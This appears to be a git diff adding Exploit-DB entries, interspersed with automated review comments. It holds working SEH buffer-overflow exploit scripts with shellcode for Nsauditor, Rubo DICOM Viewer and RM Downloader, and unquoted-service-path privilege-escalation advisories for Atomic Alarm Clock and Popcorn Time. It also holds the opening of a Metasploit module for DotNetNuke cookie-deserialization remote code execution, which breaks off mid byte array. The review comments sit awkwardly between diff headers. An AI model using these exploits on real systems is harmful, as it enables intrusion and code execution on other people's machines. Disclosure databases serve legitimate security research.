+= '\xC6\x33\x72\x40\x72\x40\x72' +## 8th byte - \x00 => \x66 +venBlinds += '\xC6\x66\x72\x40\x72\x40\x72' +## 10th byte - \x00 => \x10 +venBlinds += '\xC6\x10\x72\x40\x72\x40\x72' +## 12th byte - \x00 => \x33 +venBlinds += '\xC6\x33\x72\x40\x72\x40\x72' +## 14th byte - \x00 => \x42 +venBlinds 
+= '\xC6\x42\x72\x40\x72\x40\x72' +## 16th byte - \x00 => \x32 +venBlinds += '\xC6\x32\x72\x40\x72\x40\x72' +## 18th byte - \x00 => \x02 +venBlinds += '\xC6\x02\x72\x40\x72\x40\x72' +## 20th byte - \x00 => \x10 +venBlinds += '\xC6\x10\x72\x40\x72\x40\x72' +## 22nd byte - \x00 => \x3F +venBlinds += '\xC6\x3F\x72\x40\x72\x40\x72' +## 24nd byte - \x00 => \x1F +venBlinds += '\xC6\x1F\x72\x40\x72\x40\x72' +## 26th byte - \x00 => \x49 +venBlinds += '\xC6\x49\x72\x40\x72\x40\x72' +## 28th byte - \x00 => \x02 +venBlinds += '\xC6\x02\x72\x40\x72\x40\x72' +## 30th byte - \x00 => \xED +venBlinds += '\xC6\xED\x72\x40\x72\x40\x72' +## 32nd byte - \x00 => \xC3 +venBlinds += '\xC6\xC3\x72\x40\x72' +# Jump to the decoded decoder by Returning to the address we saved on the stack +venBlinds += '\xC3' # ret [!] Now we are executing the decoder! + +os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) + +# Custom PopCalc shellcode that avoids the bad characters +fKernel32 = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08' + +gExpotTbl = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57' + +fWinExec = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C' + +# Call WinExec( CmdLine, ShowState ); +# CmdLine = "calc.exe" +# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window +callWinExec = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3' + +shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec + +buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode +filler = 
'\x77'*(9000-len(buffer)) +buffer = buffer+filler + +try: + payload = buffer + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/exploits/windows/local/48350.py b/exploits/windows/local/48350.py new file mode 100755 index 000000000..f0465e041 --- /dev/null +++ b/exploits/windows/local/48350.py 
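Review bot: The bare `except:` around the file write discards the cause of any failure, also catches `KeyboardInterrupt` and `SystemExit`, and the message it prints gives the operator nothing to act on. Narrow it and surface the error: `except IOError as exc:` followed by `print File + ' failed to create: ' + str(exc)`. The `try` body also wraps `payload = buffer`, which cannot raise; only the `open`/`write`/`close` lines belong inside it, or the three can be replaced by `with open(File, 'w') as f:` so the handle is closed on every path.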
@@ -0,0 +1,108 @@ +# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite)) +# Date: 2020-04-17 +# Exploit Author: Cervoise +# Vendor Homepage: https://www.nsauditor.com/ +# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe +# Version: 3.2.1.0 and 3.0.28 +# Tested on: Windows 10.0.18363.778 x86 Pro EN + +# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES +(https://www.exploit-db.com/exploits/46005) +# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still +vulnerable + +# 1 -> Change the shellcode with the one you want +# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard +# 3 -> Open Nsauditor +# 4 -> In the Window select "Tools" -> "Dns Lookup" +# 5 -> Paste the content into the Field: "Dns Query'" +# 6 -> Click "Resolve" + +#!/usr/bin/python3 + +# Badchars -> +\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6 +# Maybe less badchars between \x80 and \x9f but I was lazy (I just +checked thoose I needed) + +# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v +shellcode +shellcode = b"" +shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49" +shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43" +shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30" +shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73" +shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65" +shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30" +shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62" +shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58" +shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c" +shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47" +shellcode += 
b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57" +shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63" +shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b" +shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55" +shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50" +shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a" +shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b" +shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a" +shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58" +shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58" +shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64" +shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a" +shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b" +shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36" +shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64" +shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42" +shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f" +shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e" +shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45" +shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35" +shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f" +shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71" +shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d" +shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74" +shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75" +shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53" +shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73" +shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41" + + +# 0x006ea017 : pop esi # pop ecx # ret | startnull +{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, +SafeSEH: False, OS: False, v3.0.28.0 (C:\Program +Files\Nsauditor\Nsauditor.exe) +# 0x006ea017 : pop esi # pop ecx # ret | startnull 
+{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, +SafeSEH: False, OS: False, v3.2.1.0 (C:\Program +Files\Nsauditor\Nsauditor.exe) + +pop_pop_ret = b"\x17\xa0\x6e" +jmp_back = b"\xeb\xc3\x90\x90" #JMP 0xffffffc5 + +# An address near the end of our buffer is on the stack, only three pop +are needed to get it +# Then we just have to moving at the begging of our buffer +# An egghunter does the job, but will not be compatible with all Windows +versions +going_back = b"\x58" #POP EAX +going_back += b"\x58" #POP EAX +going_back += b"\x58" #POP EAX +going_back += b"\x83\xE8\x79" #SUB EAX,0x79 +going_back += b"\x83\xE8\x79" #SUB EAX,0x79 +going_back += b"\x83\xE8\x79" #SUB EAX,0x79 +going_back += b"\x83\xE8\x79" #SUB EAX,0x79 +going_back += b"\x83\xE8\x79" #SUB EAX,0x79 +going_back += b"\xFF\xE0" #JMP EAX + +buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100) +buffer += shellcode + b"\x90"*100 +buffer += going_back +buffer += jmp_back + pop_pop_ret #nSEH / SEH + +# Write the exploit +file = open("nsauditor-3-2-1-exploit.txt", "wb") +file.write(buffer) +file.close() \ No newline at end of file diff --git a/exploits/windows/local/48351.py b/exploits/windows/local/48351.py new file mode 100755 index 000000000..19cec71f6 --- /dev/null +++ b/exploits/windows/local/48351.py 
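Review bot: The `#!/usr/bin/python3` shebang sits after roughly twenty header comment lines, where it is an ordinary comment with no effect; a shebang is only honoured on line 1. Either move it above `# Exploit Title` or drop it and record the interpreter in the header instead (the `b""` literals and the `"wb"` open are consistent with Python 3, so `# Tested with: Python 3` would be accurate if that is what was used). 48351.py in this commit has the same mid-file `#!/usr/bin/python` line.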
@@ -0,0 +1,54 @@
+# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
+# Exploit Author: bzyo
+# Date: 2020-04-17
+# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
+# Vendor Homepage: http://www.rubomedical.com/
+# Version: 2.0
+# Software Link : http://www.rubomedical.com/download/index.php
+# Tested Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate overview.txt, copy contents to clipboard
+# 2. open application
+# 3. select send dicom files, edit
+# 4. paste contents from clipBoard to "DICOM server name" field
+# 6. pop calc
+
+#!/usr/bin/python
+
+import struct
+
+junk1 = "A"*1868
+
+#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
+seh = struct.pack('<L',0x00402f0e)
+
+jmp1 = "\xeb\xf8\xcc\xcc"
+
+jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
+#Payload size: 220 bytes
+calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
+"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
+"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
+"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
+"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
+"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
+"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
+"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
+"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
+"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
+"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
+"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
+"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
+"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
+"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")
+
+junk2 = "\x90"*14
+
+buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh
+
+with open("overview.txt","wb") as f:
+    f.write(buffer[:-1])
\ No newline at end of file
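Review bot: `f.write(buffer[:-1])` silently drops the final byte of the packed SEH address (`\x00` for `0x00402f0e`) with no comment explaining why; a line such as `# drop the trailing NUL of the packed SEH address` above the write would record the intent, which is inferred here rather than stated anywhere in the file. The PoC steps in the header jump from `# 4.` to `# 6.`, so either a step was lost or the numbering should be corrected before this is published as reproduction instructions.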
diff --git a/exploits/windows/local/48352.txt b/exploits/windows/local/48352.txt
new file mode 100644
index 000000000..c14de10d9
--- /dev/null
+++ b/exploits/windows/local/48352.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
+# Exploit Author: boku
+# Date: 2020-04-17
+# Vendor Homepage: http://www.drive-software.com
+# Software Link: http://www.drive-software.com/download/ataclock.exe
+# Version: 6.3
+# Tested On: Windows 10 Pro 1909 (32-bit)
+# Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
+
+# Vulnerability Description:
+# The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
+# This security misconfiguration by the vendor can be exploited locally or as part of an attack chain.
+# By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution.
+# Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.
+
+C:\Users\boku>sc qc AtomicAlarmClock
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AtomicAlarmClock
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Atomic Alarm Clock Time
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48364.py b/exploits/windows/local/48364.py
new file mode 100755
index 000000000..9cc992e06
--- /dev/null
+++ b/exploits/windows/local/48364.py
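Review bot: The advisory ends at the `sc qc` output and offers no remediation, although the fix is to quote the image path, e.g. `sc config AtomicAlarmClock binPath= "\"C:\Program Files\Atomic Alarm Clock\timeserv.exe\""`, after which a `Program.exe` on the root drive is no longer a candidate for the service image. The description states the escalation is "from Admin to SYSTEM", while 48378.txt in the same commit describes the identical misconfiguration as reachable by an "authorized but non-privileged local user"; each advisory should say explicitly which write permission on the root of the system drive (or on the program directory) its claim assumes, since that decides the real severity. 48378.txt lacks the remediation line as well; the same `sc config "Update service" binPath= ...` quoting applies there.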
@@ -0,0 +1,69 @@ +# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) +# Date: 2020-04-20 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe +# Version: 3.1.3.2.2010.06.13 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open 'RmDownloader.exe' +# 4.- Go to 'Load' tab +# 5.- Paste clipboard in 'Load' parameter +# 6.- Click on button 'OK' +# 7.- Two messageboxes regarding the length of the payload will pop up, click OK +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" +buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" +buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" +buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" +buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" +buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" +buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" +buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" +buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" +buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" +buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" +buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" +buf += 
b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" +buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" +buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" +buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" +buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" +buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" +buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" +buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" +buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" +buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" +buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" +buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" +buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" +buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" +buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" +buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" +buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" +buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" +buf += b"\x50\x65\x67\x70\x41\x41" + + +nseh = struct.pack("<I", 0x06710870) +seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll) + +buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200 +f = open ("poc.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48378.txt b/exploits/windows/local/48378.txt new file mode 100644 index 000000000..68c3eb333 --- /dev/null +++ b/exploits/windows/local/48378.txt 
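Review bot: `buf` is a `bytes` literal (the msfvenom `-f py` output) while every other piece of `buffer` is a `str`, `nseh`/`seh` come from `struct.pack`, and the result is written through `open("poc.txt", "w")` in text mode, so the script only runs under Python 2, where `bytes` and `str` are one type; under Python 3 the `buffer = "A" * 9008 + nseh + ...` line raises `TypeError`. The header should record that (`# Python 2 only`), or the script should be made type-consistent by building the buffer from `b"..."` pieces and opening the file with `"wb"`, as 48350.py in this commit already does.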
@@ -0,0 +1,37 @@
+# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path
+# Date: 2020-04-24
+# Vendor Homepage: https://getpopcorntime.is
+# Exploit Authors: Uriel Yochpaz & Jonatan Schor
+# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
+# Version: 6.2.1.14 and probably prior versions
+# Tested on: Windows 10, 7
+# CVE : N/A
+
+[+] Description:
+Popcorn Time For Windows installs as a service with an unquoted
+service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+[+] POC:
+C:\Users\User>sc qc "Update service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Update service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Update service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+[+] Exploit:
+A successful attempt would require the local user to be able to insert their
+code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe)
+folders undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
\ No newline at end of file
diff --git a/exploits/windows/remote/48336.rb b/exploits/windows/remote/48336.rb
new file mode 100755
index 000000000..35d4381fe
--- /dev/null
+++ b/exploits/windows/remote/48336.rb
@@ -0,0 +1,970 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' +require 'openssl' +require 'set' + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HttpServer + + Rank = ExcellentRanking + + # ================================= + # Overidden setup method to allow + # for delayed handler start + # ================================= + def setup + # Reset the session counts to zero. + reset_session_counts + + return if !payload_instance + return if !handler_enabled? + + # Configure the payload handler + payload_instance.exploit_config = { + 'active_timeout' => active_timeout + } + + # payload handler is normally set up and started here + # but has been removed so we can start the handler when needed. + end + + def initialize(info = {}) + super(update_info( + info, + 'Name' => "DotNetNuke Cookie Deserialization Remote Code Execution", + 'Description' => %q( + This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. + Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML. + The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. + The cookie is processed by the application whenever it attempts to load the current user's profile data. + This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). + An attacker can leverage this vulnerability to execute arbitrary code on the system. 
+ ), + 'License' => MSF_LICENSE, + 'Author' => [ 'Jon Park', 'Jon Seigel' ], + 'References' => + [ + [ 'CVE', '2017-9822' ], + [ 'CVE', '2018-15811'], + [ 'CVE', '2018-15812'], + [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811 + [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812 + [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'], + [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'], + [ 'URL', 'https://github.com/pwntester/ysoserial.net'] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { 'auto' => true } ], + [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ], + [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ], + [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ], + [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ] + ], + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Payload' => + { + + }, + 'Privileged' => false, + 'DisclosureDate' => "Jul 20 2017", + 'DefaultOptions' => { 'WfsDelay' => 5 }, + 'DefaultTarget' => 0 + )) + + deregister_options('SRVHOST') + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path that will result in the DNN 404 response', '/__']), + OptBool.new('DryRun', [false, 'Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload', false]), + OptString.new('VERIFICATION_PLAIN', [false, %q(The known (full or partial) plaintext of the encrypted verification code. 
+ Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or GUID (v9.2.2+)), '']), + OptBool.new('ENCRYPTED', [true, %q(Whether or not to encrypt the final payload cookie; + (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.), false]), + OptString.new('KEY', [false, 'The key to use for encryption.', '']), + OptString.new('IV', [false, 'The initialization vector to use for encryption.', '']), + OptString.new('SESSION_TOKEN', [false, %q(The .DOTNETNUKE session cookie to use when submitting the payload to the target server. + DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.), '']), + OptString.new('VERIFICATION_CODE', [false, %q(The encrypted verification code received in a registration email. + Can also be the path to a file containing a list of verification codes.), '']) + ] + ) + + + initialize_instance_variables + end + + def initialize_instance_variables + # ================== + # COMMON VARIABLES + # ================== + + @target_idx = 0 + + # Flag for whether or not to perform exploitation + @dry_run = false + + # Flag for whether or not the target requires encryption + @encrypted = false + + # Flag for whether or not to attempt to decrypt the provided verification token(s) + @try_decrypt = false + + # ================== + # PAYLOAD VARIABLES + # ================== + + # ObjectStateFormatter serialized header + @osf_header = [255, 1, 50] + + # ObjectStateFormatter serialized data before the command payload + @osf_wrapper_start = [ + 0, 1, 0, 0, 0, 255, 255, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 12, 2, 0, 0, 0, 73, + 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, + 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, + 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, + 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, + 48, 56, 
57, 5, 1, 0, 0, 0, 132, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, + 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, + 99, 46, 83, 111, 114, 116, 101, 100, 83, 101, 116, 96, 49, 91, 91, 83, 121, + 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, + 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, + 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, + 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, + 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, + 57, 93, 93, 4, 0, 0, 0, 5, 67, 111, 117, 110, 116, 8, 67, 111, 109, 112, 97, + 114, 101, 114, 7, 86, 101, 114, 115, 105, 111, 110, 5, 73, 116, 101, 109, 115, + 0, 3, 0, 6, 8, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, + 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111, + 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114, + 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, + 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, + 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, + 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 